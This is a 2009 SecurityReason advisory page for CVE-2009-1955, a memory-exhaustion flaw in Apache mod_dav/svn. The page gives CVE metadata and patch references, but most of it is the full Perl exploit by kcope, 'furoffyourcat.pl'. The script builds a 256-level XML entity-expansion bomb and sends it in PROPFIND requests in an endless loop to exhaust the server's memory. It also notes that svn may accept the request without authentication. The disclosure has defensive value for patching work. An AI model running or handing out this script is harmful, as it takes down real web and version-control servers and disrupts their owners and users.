|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 5880 CVE : CVE-2009-1955 CWE : CWE-119 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes
Credit : kcope Published : 09.06.2009
Advisory Content : ###furoffyourcat.pl ### Apache mod_dav / svn Remote Denial of Service Exploit ### by kcope / June 2009 ### ### Will exhaust all system memory ### Needs Authentication on normal DAV ### ### This can be especially serious stuff when used against ### svn (subversion) servers!! Svn might let the PROPFIND slip through ### without authentication. bwhahaaha :o) ### use at your own risk! ################################################################## use IO::Socket; use MIME::Base64; sub usage { print "Apache mod_dav / svn Remote Denial of Service Exploit\n"; print "by kcope in 2009\n"; print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n"; print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit; } if ($#ARGV < 1) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $username = $ARGV[2]; $password = $ARGV[3]; $|=1; $BasicAuth = encode_base64("$username:$password"); chomp $BasicAuth; my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => 80, Proto => 'tcp'); print $sock "PROPFIND $webdavfile HTTP/1.1\r\n"; print $sock "Host: $hostname\r\n"; print $sock "Depth: 0\r\n"; print $sock "Connection: close\r\n"; if ($username ne "") { print $sock "Authorization: Basic $BasicAuth\r\n"; } print $sock "\r\n"; $x = <$sock>; print $x; if (!($x =~ /207/)) { while(<$sock>) { print; } close($sock); print "No PROPFIND on this server and path.\n"; exit(0); } $a = ""; for ($i=1;$i<256;$i++) { # Here you can increase the XML bomb count $k = $i-1; $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n" } $igzml = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ELEMENT REMOTE ANY>\n" ."<!ENTITY x0 \"foobar\">\n" .$a ."]>\n" ."<REMOTE>\n" ."&x$k;\n" ."</REMOTE>\n"; print "Apache mod_dav / svn Remote Denial of Service Exploit\n"; print "by kcope in 2009\n"; print "Launching DoS Attack...\n"; $ExploitRequest = "PROPFIND $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n" ."Depth: 0\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($igzml)."\r\n\r\n" . $igzml; while(1) { again: my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => 80, Proto => 'tcp') || (goto again); print $sock $ExploitRequest; print ";Pp"; } References : http://securityreason.com/expldownload/1/6335/1 (Exploit) http://www.debian.org/security/2009/dsa-1812
http://www.apache.org/dist/apr/CHANGES-APR-UTIL-1.3
http://svn.apache.org/viewvc?view=rev&revision=781403
http://securityreason.com/exploitalert/6335
 Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |